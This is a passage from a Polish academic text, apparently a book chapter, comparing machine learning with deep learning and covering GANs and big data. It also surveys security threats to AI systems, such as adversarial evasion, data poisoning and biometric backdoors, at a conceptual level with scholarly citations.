modelu – nie w sensie matematycznym, ale empirycznym – por. Wordliczek Ł., Wykorzystanie sztucznych
sieci neuronowych w badaniach politologicznych, PWN 2021, s.32-35;
8
Metody typu „czarna skrzynka” mają kilka bardzo atrakcyjnych właściwości 1/ są co najmniej dwukrotnie
szybsze niż metody oparte na gradientach; 2/ zoptymalizowany cel i polityka, które traktowane są jako
„czarna skrzynka” nie wymagają wielu założeń; 3/ Metody te mogą na ogół bardzo dobrze działać
współbieżnie. Wadą tych metod jest zwykle niższa wydajność próbkowania. W szczególności proste, losowe
wyczekiwanie polityki, realizowane za pomocą sieci neuronowej zawierającej pół miliona parametrów, ma
bardzo niskie prawdopodobieństwo powodzenia - Lapan M. Głębokie uczenie przez wzmacnianie. Praca z
chatbotami oraz robotyka, optymalizacja dyskretna i automatyzacja sieciowa w praktyce. Wydanie II, Helion
Gliwice 2022, s. 572-573
9
Sumpter D., Osaczeni przez liczby., Copernicus Center Press Kraków 2019, s. 29
10
Por. Goodfellow Y., Bengio Y., Courville A., Deep Learning, The MIT Press London 2016; Tabor J.,
Śmieja M., Struski Ł., Spurek P., Wołczyk M., Głębokie uczenie. Wprowadzenie, Wyd. Helion Gliwice 2022;
warto podkreślić, iż pojęcie Deep learning weszło do użycia w 2006 r. „Dla wielu osób zdefiniowanie pojęcia
głębokiego uczenia jest nie lada wyzwaniem, ponieważ w ciągu ostatniej dekady zmieniało ono stopniowo
swoje znaczenie. Jedna ze stosowanych definicji stanowi, że głębokie uczenie jest cechą „sieci neuronowej
złożonej z więcej niż dwóch warstw”. Problem z tą definicją polega na tym, że sugeruje ona, że pojęcie
głębokiego uczenia istnieje od lat 80. ubiegłego wieku. W rzeczywistości sieci neuronowe przewyższają
architektonicznie wcześniejsze formy sieci (i dodatkowo charakteryzują się znacznie większymi mocami
obliczeniowymi) i w ciągu ostatnich lat dostarczyły spektakularnych wyników” - Patterson J., Gibson A., Deep
Learning. Praktyczne wprowadzenie, Helion Gliwice 2018, s. 23.
264
uczenia głębokiego pobierają informacje z wielu źródeł danych i analizują te dane w
czasie rzeczywistym, bez konieczności interwencji ze strony człowieka. W uczeniu
maszynowym algorytm musi powiedzieć, jak dokonać dokładnego przewidywania,
zużywając więcej informacji (na przykład przez wyodrębnianie funkcji)
11
. W uczeniu
głębokim algorytm może nauczyć się wykonywać dokładne przewidywanie przy użyciu
własnego przetwarzania danych dzięki sztucznej strukturze sieci neuronowej. Nadto
podstawowym czynnikiem wyróżniającym deep learning jest to, że proces uczenia nie
wymaga kontroli człowieka, czyli zachodzi w sposób nienadzorowany
12
. Różnice
między klasycznym uczeniem maszynowym a uczeniem głębokim maszynowym
prezentuje tabela nr 2.
Tabela 2. Porównanie uczenia maszynowego (Machine Learning) z głębokim uczeniem
maszynowym (Deep learning)
Uczenie maszynowe (Machine
Learning)
Głębokie uczenie maszynowe
(Deep learning)
Czas uczenia
Trenowanie trwa stosunkowo mało
czasu, od kilku sekund do kilku
godzin.
Zwykle trenowanie trwa długo,
ponieważ algorytm uczenia
głębokiego obejmuje wiele warstw.
Zależności
sprzętowe
Nie wymaga dużej mocy
obliczeniowej.
Obliczenia wykonywane są na CPU
(ang. central processing unit,
procesor)
Zależy od maszyn wysokiej klasy. Z
założenia wykonuje dużą liczbę
operacji mnożenia macierzy.
Może uczyć się na CPU, ale zalecane
jest również GPU (ang. Graphics
Processing Unit, koprocesor
graficzny), który może efektywnie
zoptymalizować te operacje.
Dane
wejściowe
Nie wymaga dużych zbiorów
danych; może uczyć się na
mniejszych zbiorach
Wymaga dużych zbiorów danych
Dane
wyjściowe
Dane wyjściowe są zwykle
wartością liczbową, na przykład
oceną lub klasyfikacją.
Dane wyjściowe mogą mieć wiele
formatów, takich jak tekst, wynik lub
dźwięk.
Liczba
punktów
danych
Może używać małych ilości danych
do przewidywania.
Aby zaplanować przewidywania,
należy użyć dużych ilości danych
treningowych.
Sposób
uczenia
Dzieli proces uczenia się na
mniejsze kroki. Następnie łączy
wyniki z każdego kroku w jedno
dane wyjściowe.
Przechodzi przez proces uczenia się,
rozwiązując zagadnienie na zasadzie
kompleksowej.
Proces
cechowania
Wymaga dokładnego
zidentyfikowania i utworzenia
funkcji przez użytkowników.
Uczy się funkcji wysokiego poziomu
na podstawie danych i tworzy nowe
funkcje autonomicznie.
Źródło: Opracowanie własne
11
Uczenie głębokie a uczenie maszynowe w usłudze Azure Machine Learning, Microsoft, 27 sierpnia 2022,
https://docs.microsoft.com/pl-pl/azure/machine-learning/concept-deep-learning-vs-machine-learning
12
Ghorbanzadeh O., Blaschke T., Gholamnia K., Meena S. R., Tiede D, Aryal J., Evaluation of Different
Machine Learning Methods and Deep-Learning Convolutional Neural Networks for Landslide Detection,
Remote Sens 2019, nr 11(2), s. 196, https://doi.org/10.3390/rs11020196
265
Bez wątpienia ewolucja modeli generatywnej sztucznej inteligencji (Generative
Adversarial Networks, GAN, GenAI) była najważniejszym momentem transformacji
cyfrowej w roku 2022. To konfiguracja ML zaprojektowana przez Iana Goodfellowa i
jego współpracowników w czerwcu 2014 roku
13
, w której dwa różne systemy ML
konkurują ze sobą w celu poprawy uczenia się zadania. Obecnie istnieje wiele odmian
sieci GAN, wszystkie wykorzystują głębokie sieci neuronowe i mają tę samą prostą
architekturę. Przetwarzane w nich są dowolne formy treści cyfrowych, od statycznych
obrazów i tekstu po strumienie audio i wideo. Co więcej, algorytmy leżące u podstaw
sieci GAN są często wydawane z licencjami typu open source, co oznacza, że każdy
online może je pobrać i trenować. Głównym ograniczeniem nie jest wiedza techniczna,
ale raczej posiadanie niezbędnych danych szkoleniowych i mocy obliczeniowej (zwykle
klaster CPU/GPU).
Sieci GAN (Generative Adversarial Networks) cieszą się dużą popularnością z
kilku powodów:
1. Generowanie wysokiej jakości danych - Sieci GAN są stosowane do
generowania nowych danych, takich jak obrazy, dźwięki, teksty itp. Są one
znane z zdolności do tworzenia realistycznych i wiarygodnych danych, które
są trudne do odróżnienia od prawdziwych. Dzięki temu mają szerokie
zastosowanie w dziedzinach takich jak generowanie obrazów artystycznych,
syntetyzowanie dźwięków muzycznych, tworzenie realistycznych animacji i
wiele innych.
2. Poprawa jakości istniejących danych - Sieci GAN można wykorzystać do
poprawy jakości istniejących danych. Na przykład, poprzez trening sieci GAN
na zbiorze danych zaszumionych lub uszkodzonych, można uzyskać modele
zdolne do rekonstrukcji oryginalnych danych w bardziej czystej i czytelnej
formie. Jest to szczególnie przydatne w dziedzinach takich jak odtwarzanie
obrazów, eliminowanie szumów z sygnałów audio itp.
3. Możliwość tworzenia nowych i kreatywnych danych - Sieci GAN nie tylko
naśladują dane istniejące, ale także potrafią tworzyć nowe i kreatywne dane,
które nie były wcześniej widziane. To sprawia, że sieci GAN są atrakcyjne dla
wielu dziedzin, takich jak sztuka, rozrywka czy nauka
4. Rozpoznawanie i klasyfikacja obrazów - Sieci GAN mogą być
wykorzystywane do treningu modeli rozpoznawania i klasyfikacji obrazów. Na
przykład, poprzez wprowadzenie generatora GAN w proces uczenia
klasyfikatora, możliwe jest generowanie syntetycznych obrazów
reprezentujących różne klasy, co pomaga w zwiększeniu różnorodności i
liczby danych treningowych.
5. Możliwość uczenia się z niewielką ilością danych - Sieci GAN nie wymagają
dużej ilości danych uczących, ponieważ generator uczy się na podstawie
błędów popełnianych przez dyskryminatora, a nie na podstawie konkretnych
13
Goodfellow I., Pouget-Abadie J., Mirza M., Xu B., Warde-Farley D., Ozair S., Courville A., Bengio Y.,.
Generative Adversarial Networks, Advances in Neural Information Processing Systems 2014, nr 3(11),
DOI:10.1145/3422622, https://www.researchgate.net/profile/Y-
Bengio/publication/263012109_Generative_Adversarial_Networks/links/546b70220cf20dedafd5303b/Generat
ive-Adversarial-Networks.pdf lub https://papers.nips.cc/paper/5423-generative-adversarial-nets.pdf
266
przykładów danych. To oznacza, że sieci GAN mogą być skuteczne nawet
wtedy, gdy dostępne dane są ograniczone lub kosztowne do pozyskania.
6. Badania nad generatywnością - Sieci GAN są również atrakcyjne dla badaczy
14
ze względu na ich zdolność do badania i modelowania procesów
generatywnych. Przez manipulację wektorami latentnymi
15
, można odkrywać
różne cechy danych i ich wpływ na generowane wyniki. To prowadzi do
głębszego zrozumienia procesów generacji danych i otwiera nowe możliwości
eksploracji kreatywności modeli generatywnych.
7. Rozwój technologiczny - W ostatnich latach nastąpił znaczny postęp w
dziedzinie sieci GAN, zarówno pod względem architektury, jak i algorytmów
szkoleniowych
16
. Nowe techniki, takie jak StyleGAN, CycleGAN, DALL-E,
przyciągnęły dużą uwagę ze względu na swoje innowacyjne możliwości
generowania i manipulowania danymi.
Poza zaletami sieci GAN mają wady, do których zaliczyć należy:
1. Stabilność treningu - Proces treningu sieci GAN może być trudny i
niestabilny. Wielokrotnie może wystąpić problem równowagi między
generatorem a dyskryminatorem, co może prowadzić do trudności w
uzyskaniu zadowalających wyników. Często wymaga to eksperymentowania
z hiperparametrami, doborem odpowiednich architektur sieci i technikami
regularyzacji.
2. Czasochłonność treningu - Sieci GAN są znacznie bardziej złożone i
czasochłonne w treningu niż tradycyjne modele uczące się nadzorowane. Ze
względu na iteracyjny charakter treningu, wymagają one większej liczby
obliczeń i danych treningowych. Trening sieci GAN może wymagać wielu
godzin, dni lub nawet tygodni, szczególnie dla dużych zbiorów danych i
zaawansowanych architektur.
3. Trudności interpretacyjne - Generowane przez sieci GAN wyniki są często
trudne do interpretacji. Sieci GAN działają jako czarne skrzynki, a proces
generacji danych jest złożony i trudny do wyjaśnienia. Nie zawsze jest jasne,
jakie cechy wpływają na wynik generacji i jak dokładnie manipulować
wektorami latentnymi, aby uzyskać pożądane rezultaty.
4. Brak kontroli nad wynikami - W przypadku niektórych zastosowań sieci
GAN, takich jak generowanie obrazów, może być trudno zachować pełną
14
McDaniel P., Papernot N., Celik Z.B., Machine Learning in Adversarial Settings, IEEE Security & Privacy
2016, https://beerkay.github.io/papers/Berkay2016adversarialSPMagazine.pdf
15
W kontekście Generative Adversarial Networks (GAN) pojęcie "wektor latentny" odnosi się do wektora
liczb lub punktu w przestrzeni niskowymiarowej, który jest wykorzystywany jako wejście dla generatora w
celu generowania danych syntetycznych. Wektor latentny jest używany jako punkt odniesienia przez
generator, który na podstawie tego wektora tworzy odpowiednią reprezentację danych, na przykład obrazów.
Generator przekształca wektor latentny w przestrzeń danych, wykorzystując złożone operacje matematyczne.
Poprzez eksplorację różnych wartości wektora latentnego można uzyskać różne wygenerowane dane. Ważne
jest, że wektor latentny nie ma bezpośredniego odwzorowania na konkretne cechy generowanych danych.
Zamiast tego jest on wykorzystywany do kontrolowania ogólnych właściwości danych, a szczegóły są
modelowane przez wewnętrzne mechanizmy generatora. Dzięki temu wektor latentny umożliwia
eksplorowanie przestrzeni generacyjnej, co pozwala na generowanie różnorodnych i zróżnicowanych danych.
16
Holger C., A list of papers on Generative Adversarial (Neural) Networks: nightrome/really-awesome-gan,
State on 1 Nov 2021, https://github.com/nightrome/really-awesome-gan
267
kontrolę nad wynikami generacji. Mimo że sieci GAN są w stanie generować
wysokiej jakości dane, nie ma gwarancji, że wygenerowane próbki spełnią
wszystkie oczekiwania użytkownika. Wyniki mogą być nieprzewidywalne i
niezadowalające.
5. Zależność od danych treningowych - Efektywność sieci GAN jest w dużej
mierze uzależniona od jakości i różnorodności danych treningowych. Jeśli
zbiór danych treningowych jest niewystarczający lub nieodpowiednio
reprezentatywny, generowane wyniki mogą być niedokładne lub
niewiarygodne. Ponadto, sieci GAN mogą odzwierciedlać niepożądane
wzorce lub zniekształcenia, które są obecne w danych treningowych.
Terminem występującym wspólnie lub obok AI, zwłaszcza przy omawianiu
głębokiego uczenia, jest pojęcie Big Data oznaczające duże, zmienne i różnorodne zbiory
danych, których przetwarzanie i analiza są trudne, ale jednocześnie wartościowe,
ponieważ mogą prowadzić do zdobycia nowej wiedzy
17
.
Przyczynami, dla których Big Data jest tak bardzo istotna dla rozwoju AI, są:
1. Dostarczanie danych uczących dla algorytmów AI - Big Data to ogromne
zbiory danych, które są zbyt duże i złożone, aby mogły być przetwarzane
przez tradycyjne oprogramowanie. Algorytmy AI, takie jak uczenie
maszynowe czy głębokie uczenie się, wymagają dużej ilości danych
uczących, aby nauczyć się rozpoznawać wzorce, klasyfikować obiekty czy
generować wyniki. Big Data umożliwia algorytmom AI dostęp do
różnorodnych i bogatych danych pochodzących z wielu źródeł, takich jak
internet, media społecznościowe, urządzenia IoT czy systemy biznesowe.
2. Zwiększanie dokładności i niezawodności wyników AI - Big Data nie tylko
zapewnia dane uczące dla algorytmów AI, ale także pomaga w poprawie
jakości i wiarygodności ich wyników. Im więcej danych jest dostępnych dla
algorytmów AI, tym lepiej mogą one dostosować się do zmieniających się
warunków i uwzględnić różne czynniki wpływające na problem. Big Data
pozwala również na weryfikację i ocenę wyników AI poprzez porównywanie
ich z rzeczywistymi danymi lub danymi historycznymi.
3. Umożliwianie nowych i innowacyjnych zastosowań AI - Big Data nie tylko
wspiera istniejące zastosowania AI, ale także stymuluje tworzenie nowych i
innowacyjnych rozwiązań opartych na AI. Dzięki Big Data możliwe jest
wykorzystanie AI do rozwiązywania trudnych lub wcześniej niemożliwych
problemów, takich jak analiza obrazu czy mowy, generowanie treści czy
sztuka. Big Data umożliwia również wykorzystanie AI do optymalizacji
procesów biznesowych, poprawy jakości usług czy tworzenia
spersonalizowanych doświadczeń dla klientów
17
Szerzej - Harrison G., NoSQL, NewSQL i BigData. Bazy danych następnej generacji, Helion 2019; Marz
N., Warren J., Big Data. Najlepsze praktyki budowy skalowalnych systemów obsługi danych w czasie
rzeczywistym, Helion 2016; Stephenson D., Big data, nauka o danych i AI bez tajemnic. Podejmuj lepsze
decyzje i rozwijaj swój biznes!, Helion 2019; Parlament Europejski, Big data: definicja, korzyści, wyzwania
(infografika), Aktualności – Społeczeństwo, ostatnia aktualizacja: 17-03-2023,
https://www.europarl.europa.eu/news/pl/headlines/society/20210211STO97614/big-data-definicja-korzysci-
wyzwania-infografika
268
ZAGROŻENIA BEZPIECZEŃSTWA DLA SYSTEMÓW AI
Wraz ze wzrostem możliwości sztucznej inteligencji, w ciągu ostatnich dwóch
dekad, znaczna liczba badaczy uświadomiła sobie znaczenie tworzenia nie tylko zdolnych
inteligentnych systemów, ale także ich bezpieczeństwa. Roman V. Yampolskiy z
Uniwersytetu w Louisville wręcz twierdzi o nieprzewidywalności sztucznej inteligencji
18
, która ogranicza naszą zdolność zrozumienia wpływu rozwijanych inteligentnych
systemów i stanowi wyzwanie dla weryfikacji oprogramowania i inteligentnego
sterowania systemami, a także AI Safety
19
ogólnie. Głębokie sieci neuronowe wykazały
fenomenalny sukces (często przekraczający ludzkie możliwości) w rozwiązywaniu
złożonych problemów, ostatnie badania pokazują, że są one podatne na ataki przeciwnika
w postaci subtelnych zakłóceń danych wejściowych, które prowadzą model do
przewidywania nieprawidłowych wyników
20
. Już w 2019 r. badacze z Microsoft i
Berkman Klein Center for Internet and Society na Uniwersytecie Harvarda napisali „w
ostatnich dwóch latach powstało ponad 200 publikacji na temat możliwych awarii
systemów uczenia maszynowego spowodowanych atakiem na dane i algorytmy, a liczba
ta będzie wielokrotnie wyższa, gdy uwzględnimy też tryby awarii niespowodowanych
atakiem. Ten ogrom literatury sprawia, że praktykom uczenia maszynowego, nie mówiąc
już o inżynierach, prawnikach i prawodawcach, trudno jest być na bieżąco z rodzajami
ataków na systemy ML i zabezpieczeń tych systemów”
21
. W dniach 12-13 lutego 2016 r.,
odbyły się warsztaty stowarzyszenia Association for the Advancement of Artificial
Intelligence's Thirtieth AAAI Conference on Artificial Intelligence (AAAI-16) podczas
których Roman Yampolskiy zaprezentował taksonomię ścieżek do niebezpiecznej
sztucznej inteligencji, stworzoną w ramach projektu „Evaluation of Safe Development
Pathways for Artificial Superintelligence” wykonywanego dzięki grantowi Future of Live
Institute i Elona Muska. W stworzonej macierzy posortował systemy AI ze względu na
to, jak powstały i na jakim etapie stały się niebezpieczne. Prezentuję ją według
stworzonego przez niego wzorca w tabeli nr 3.
Wyniki jego dociekań zostały w dużym stopniu powtórzone w raporcie
analizującym krajobraz potencjalnych zagrożeń bezpieczeństwa ze złośliwych
zastosowań sztucznej inteligencji, stworzonym przez grupę 26 badaczy w lutym 2018 r. i
opublikowanym przez Instytut Przyszłości Ludzkości (FHI), multidyscyplinarny instytut
badawczy na Uniwersytecie Oksfordzkim
22
. Trzeba wyraźnie zaznaczyć, że mimo
dynamicznego rozwoju systemów AI od momentu jego tworzenia, dokument ten nie
utracił nic na swojej wartości merytorycznej.
18
Yampolskiy R.V., Unpredictability of AI, 29 maja 2019, https://doi.org/10.48550/arXiv.1905.13053
19
AI Safety można ogólnie zdefiniować jako dążenie do zapewnienia, że sztuczna inteligencja jest wdrażana
w sposób, który nie szkodzi ludzkości. Por. https://faculty.ai/blog/what-is-ai-safety/
20
Akhtar N., Mian A., Threat of Adversarial Attacks on Deep Learning in Computer Vision: A Survey, ver. 3,
26 lutego 2018, https://doi.org/10.48550/arXiv.1801.00553
21
Kumar R.S.S., O’Brien D., Snover J., Albert K., Viljoen S., Tryby awarii w uczeniu maszynowym,
Microsoft Ignite, listopad 2019, https://learn.microsoft.com/pl-pl/security/engineering/failure-modes-in-
machine-learning
22
Brundage M. i in., The Malicious Use of Artificial Intelligence: Forecasting, Prevention, and
Mitigation, Future of Humanity Institute Oxford U.K., February 2018
269
Tabela 3. Drogi do niebezpiecznej sztucznej inteligencji według Romana Yampolskiego
Źródło: Opracowanie własne na podstawie : Yampolskiy R. V. [2016], Taxonomy of Pathways to
Dangerous Artificial Intelligence, The Workshops of the Thirtieth AAAI Conference on Artificial
Intelligence AI, Ethics, and Society, February 12–13, 2016 Phoenix, Arizona,, Technical Report
WS-16-02: AI, E
Jak i kiedy AI
staje się
niebezpieczna
Przyczyny zewnętrzne
Przyczyny
wewnętrzne
Celowe
Przez pomyłkę
Środowisko
Niezależne
Koordynacja czasu
Przed wdrożeniem
➢ Militarne
tworzenie
celowo
niebezpiecznych
robotów i
inteligentnego
oprogramowani
a typu roboty-
żołnierze, drony
i cyberbroń
(używana do
penetracji sieci i
powodowania
zakłóceń w
infrastrukturze);
➢ Sabotaż
przez osobę z
niezbędnym
dostępem
(programista,
tester, a nawet
woźny), która z
wielu możliwych
powodów może
zmienić
oprogramowani
e, aby uczynić je
niebezpiecznym
.
➢ Celowe
tworzone w celu
popełniania
przestępstw
Błędy w
projektowaniu, a w
szczególności:
✓ stworzenie
„niewłaściwej
sztucznej
inteligencji”,
systemu, który
nie pasuje do
naszych
pierwotnych
pożądanych
właściwości
formalnych lub
ma niepożądane
zachowania
✓ wybranie
niesprawdzoneg
o człowieka do
badań np.
podczas uczenia
komputerów
rozpoznawania
emocji u innych i
okazywania
emocji
✓ brak współpracy
systemu z
projektantami i
opiekunami po
wdrożeniu,
czego efektem
może być
niepoprawianie
błędów ze
okresu
wstępnego
projektowania
Każde zaawansowane
inteligentne
oprogramowanie jest
bezpośrednio
projektowane lub
rozwijane do
określonego celu.
Możliwy jest jednak
scenariusz, że
wykorzystany
zostanie kompletny
pakiet z jakiegoś
nieznanego źródła.
Rekurencyjne samo-
doskonalenie.
Jednym z zagrożeń w
takim scenariuszu
jest to, że system
może ewoluować,
aby stać się
samoświadomym,
dobrowolnym,
niezależnym lub
emocjonalnym i
uzyskać szereg
innych nowych
właściwości, co
może zmniejszyć
prawdopodobieńst
wo przestrzegania
jakichkolwiek
wbudowanych
zasad lub przepisów
i zamiast tego
realizować własne
cele,
prawdopodobnie ze
szkodą dla
ludzkości.
270
Atak na system AI
Jak już wcześniej definiowałem, sztuczna inteligencja jest maszyną, czyli
sztucznym, złożonym cybernetycznym systemem komputer-oprogramowanie-osprzęt
podatnym na klasyczne zagrożenia identyfikowane dla systemów informatycznych,
popularnie zwane z angielska kryteriami triady CIA (Confidentiality – poufność, Integrity
– integralność, Availability - dostępność)
23
. I tak jak w klasycznych systemach
informatycznych mamy tu do czynienia z:
• awariami zamierzonymi spowodowanymi przez czynne działania osoby
niepożądanej, zmierzające do pokonania zabezpieczeń systemu i osiągnięcia określonego
celu — wprowadzenia błędów w klasyfikacji wyników, odkrycia prywatnych danych
treningowych lub kradzieży bazowego algorytmu
24
,
• awariami niezamierzonymi wynikającymi z dostarczenia formalnie
prawidłowego, ale niebezpiecznego wyniku przez system ML
25
.
Warto w tym miejscu zauważyć, że istnieją różne taksonomie i klasyfikacje opisujące
poszczególne typy ataków na systemy uczące.
Jerzy Surma, opierając się o wspomniane wyżej kryteria ochrony informacji, w
stworzonej taksonomii ataków na systemy uczące
26
opisuje dość dokładnie zjawiska
ingerencji w proces budowania i stosowania modeli AI opartych na uczeniu maszynowym.
Ram Shankar, Siva Kumar, David O’Brien, Jeffrey Snover, Kendra Albert i Salome
Viljoen w swoim dynamicznym dokumencie
27
, który z założenia zmienia się na stronie
‘learn.microsoft.com' wraz z nowo odkrytymi zagrożeniami, wg stanu na połowę 2023 r.,
prezentują 17 scenariuszy ataków podzielonych na dwie grupy - awarie zamierzone i
awarie niezamierzone, przedstawiając krótką definicję ataku oraz ilustrujący ją przykład
z literatury. W październiku 2019 r. został opublikowany szkic dokumentu NISTIR 8269
„Taksonomia i terminologia kontradyktoryjnego uczenia maszynowego” (A Taxonomy
and Terminology of Adversarial Machine Learning)
28
, który po dyskusji, w marcu 2023
r. został zmieniony na wstępny projekt publiczny raportu NIST AI 100-2 E2023
„Przeciwstawne uczenie maszynowe: taksonomia i terminologia ataków i środków
zaradczych” (Adversarial Machine Learning. A Taxonomy and Terminology of Attacks
and Mitigations)
29
, będący do końca września 2023 r. w procesie zbierania opinii i
23
Por. Liderman K., Bezpieczeństwo informacyjne, PWN, Warszawa 2012, Białas A., Bezpieczeństwo
informacji i usług w nowoczesnej instytucji i firmie, PWN Warszawa 2017
24
Li G., Zhu P., Li J., Yang Z., Cao N., Chen Z., Security Matters: A Survey on Adversarial Machine
Learning, 23 października 2018, https://doi.org/10.48550/arXiv.1810.07339 ; Chakraborty A., Alam M., Dey
V., Chattopadhyay A., Mukhopadhyay D., Adversarial Attacks and Defences: A Survey, 28 września 2018,
https://doi.org/10.48550/arXiv.1810.00069 ;
25
Amodei D., Olah C., Steinhardt J., Christiano P., Schulman J., Mané D., Concrete Problems in AI Safety,
25 lipca 2016, https://doi.org/10.48550/arXiv.1606.06565
26
Surma J., Hakowanie sztucznej inteligencji, PWN Warszawa 2021, s. 23-29
27
Kumar R.S.S., O’Brien D., Snover J., Albert K., Viljoen S., Tryby awarii w uczeniu maszynowym,
Microsoft Ignite, 2 wczerwca 2023, https://learn.microsoft.com/pl-pl/security/engineering/failure-modes-in-
machine-learning
28
Taksonomia i terminologia adwersyjnego (kontradyktoryjnego) uczenia maszynowego została opracowana
jako krok w kierunku zabezpieczenia aplikacji AI i zawiera taksonomię pojęć i terminologii
charakterystycznych dla AML. Dostępna jest na stronie https://doi.org/10.6028/NIST.IR.8269-draft
29
Ten raport NIST AI rozwija taksonomię pojęć i definiuje terminologię w dziedzinie kontradyktoryjnego
uczenia maszynowego (AML). Taksonomia opiera się na przeglądzie literatury AML i jest ułożona w
hierarchię koncepcyjną, która obejmuje kluczowe typy metod ML i etap cyklu życia ataku, cele i zadania
271
komentarzy. Jak zaznaczają autorzy w treści tego raportu jego celem "nie jest
przedstawienie wyczerpującego przeglądu całej literatury na temat przeciwdziałania
atakom na ML. W rzeczywistości samo to jest prawie niemożliwym zadaniem, ponieważ
wyszukiwanie artykułów AML w latach 2021 i 2022 w arXiv dało ponad 5000 odniesień.
W raporcie tym przedstawiono raczej kategoryzację ataków i sposobów ich łagodzenia,
zaczynając od trzech głównych typów ataków: 1) unikania, 2) zatruwania danych i modeli
oraz 3) prywatności danych i modeli”
30
.
Atakujący mogą eksploatować uczenie maszynowe na kilka sposobów.
Pierwszym – i najprostszym – jest budowanie własnych środowisk uczenia maszynowego
i modelowanie własnych praktyk złośliwego oprogramowania i ataków w celu określenia
typów zdarzeń i zachowań poszukiwanych przez obrońców. Na przykład wyrafinowane
złośliwe oprogramowanie może modyfikować lokalne biblioteki i komponenty systemu,
uruchamiać procesy w pamięci i komunikować się z jedną lub kilkoma domenami
należącymi do infrastruktury kontrolnej napastnika. Wszystkie te działania w połączeniu
tworzą profil znany jako taktyka, techniki i procedury (TTP). Obserwując i przewidując
sposób wykrywania TTP przez zespoły ds. bezpieczeństwa, przeciwnicy mogą subtelnie
i często modyfikować wskaźniki i zachowania, aby wyprzedzić obrońców, którzy do
wykrywania ataków polegają na narzędziach opartych na sztucznej inteligencji
31
.
Atakujący wykorzystują również uczenie maszynowe i sztuczną inteligencję, aby narażać
środowiska na szwank, zatruwając modele sztucznej inteligencji niedokładnymi danymi
32
.
Modele uczenia maszynowego i sztucznej inteligencji opierają się na prawidłowo
oznaczonych próbkach danych w celu tworzenia dokładnych i powtarzalnych profili
wykrywania. Wprowadzając łagodne pliki, które wyglądają podobnie do złośliwego
oprogramowania lub tworząc wzorce zachowań, które okazują się fałszywie pozytywne,
osoby atakujące mogą oszukać modele sztucznej inteligencji, aby uwierzyły, że
zachowania ataku nie są złośliwe. Atakujący mogą również zatruwać modele AI,
wprowadzając złośliwe pliki, które szkolenia AI oznaczałyby jako bezpieczne.
Atakujący aktywnie starają się mapować istniejące i rozwijające się modele sztucznej
inteligencji wykorzystywane przez dostawców cyberbezpieczeństwa i zespoły
operacyjne
33
. Ucząc się, jak działają modele AI i co robią, cyberprzestępcy mogą
aktywnie zakłócać operacje i modele uczenia maszynowego podczas swoich cykli. Może
atakującego oraz możliwości atakującego i wiedzę na temat procesu uczenia się. W sprawozdaniu
przedstawiono również odpowiednie metody łagodzenia skutków ataków i zarządzania nimi oraz wskazano
istotne otwarte wyzwania, które należy uwzględnić w cyklu życia systemów sztucznej inteligencji. Dostępny
jest na stronie
30
The goal of this report is not to provide an exhaustive survey of all literature on AML. In fact, this by itself
is an almost impossible task as a search on arXiv for AML articles in 2021 and 2022 yielded more than 5000
references. Rather, this report provides a categorization of attacks and their mitigations, starting with the three
main types of attacks: 1) evasion, 2) data and model poisoning, and 3) data and model privacy - Oprea A.,
Vassilev A., Adversarial Machine Learning. A Taxonomy and Terminology of Attacks and Mitigations, NIST
AI 100-2e2023. ipd, s.4, https://doi.org/10.6028/NIST.AI.100-2e2023.ipd
31
Shackleford D., How hackers use AI and machine learning to target enterprises, TechTarget,
https://www.techtarget.com/searchsecurity/tip/How-hackers-use-AI-and-machine-learning-to-target-
enterprises
32
Nichols S., Stale sessions, ML poisoning among 2021's top security threats, TechTarget, 21 maja 2021,
https://www.techtarget.com/searchsecurity/news/252501236/Stale-sessions-ML-poisoning-among-2021s-top-
security-threats
33
Burke J., Securing AI during the development process, TechTarget, 25 stycznia 2022,
https://www.techtarget.com/searchenterpriseai/tip/Securing-AI-during-the-development-process
272
to umożliwić hakerom wpływanie na model poprzez nakłanianie systemu do
faworyzowania atakujących i ich taktyki. Może również umożliwić hakerom całkowite
obejście znanych modeli poprzez subtelną modyfikację danych, aby uniknąć wykrycia na
podstawie rozpoznanych wzorców. Systemy AI są podatne także na inny rodzaj ataku
zwany atakiem korupcji usługi. Przeciwnik może chcieć nie tyle wyłączyć system SI, ile
zmniejszyć jego skuteczność. Uszkodzona funkcja może być również odskocznią do
typowych ataków. Na przykład sztuczna inteligencja wykorzystywana do
identyfikowania podejrzanej aktywności w sieci może potencjalnie zostać zaślepiona na
niektóre działania, jeśli nauczy się je ignorować; złoczyńcy mogli wówczas agresywnie
angażować się w te działania.
Giulio Lovisotto, Simon Eberz, i Ivan Martinovic udowodnili
34
, że ataki mogą
być przeprowadzane nawet przez osoby atakujące z ograniczeniami fizycznymi (brak
cyfrowego dostępu do czujnika) i zerową znajomością danych treningowych (nie znają
ani granic decyzyjnych, ani szablonu użytkownika). Na podstawie własnych szablonów
przeciwników tworzą kilka próbek pośrednich, które stopniowo zmniejszają odległość
między ich własnym szablonem a szablonem legalnego użytkownika. Gdy te
przeciwstawne próbki zostaną dodane do szablonu, osoba atakująca zostanie ostatecznie
zaakceptowana wraz z prawowitym użytkownikiem. Aby uniknąć wykrycia, projektuje
atak tak, aby zminimalizować liczbę odrzuconych próbek. Okazuje się, że w
scenariuszach typu white-box przeciwnicy mogą z powodzeniem przeprowadzić atak w
ponad 70% przypadków przy mniej niż dziesięciu próbach wstrzyknięcia. Nawet w
scenariuszach czarnych skrzynek badacze stwierdzili, że wykorzystywanie możliwości
przenoszenia próbek przeciwstawnych z modeli zastępczych może prowadzić do udanych
ataków w około 15% przypadków.
Najbardziej godnym uwagi przykładem rozszerzonych zagrożeń AI jest
wykorzystywanie botów do ingerowania w sieci społecznościowe. Boty wykorzystujące
sztuczną inteligencję infiltrują grupy i konta w mediach społecznościowych, aby
wpływać na postrzeganie lub wydobywać dane osobowe do celów przestępczych. Według
firmy technologicznej Imperva
35
ruch tzw. złych botów stanowił rekordowe 27,7% całego
globalnego ruchu w witrynach internetowych w 2021 r., w porównaniu z 25,6% w 2020
r. W połączeniu z dobrym ruchem botów, 42,3% ruchu internetowego w ubiegłym roku
nie pochodziło od ludzi, w porównaniu do 40,8% w 2020 r. Ruch ludzki zmniejszył się o
2,5% do 57,7% całego ruchu. Trzy najczęstsze ataki botów w 2021 r. to przejęcie konta,
34
Lovisotto G., Eberz S., Martinovic I., Biometric Backdoors: A Poisoning Attack Against Unsupervised
Template Updating, 2020 IEEE European Symposium on Security and Privacy (EuroS&P), 22 maja 2019,
DOI:10.1109/EuroSP48549.2020.00020, https://arxiv.org/pdf/1905.09162.pdf
35
2022 Imperva Bad Bot Report. Evasive Bots Drive Online Fraud, Imperva,
https://www.imperva.com/resources/resource-library/reports/bad-bot-report/
273
skrobanie (scraping)
36
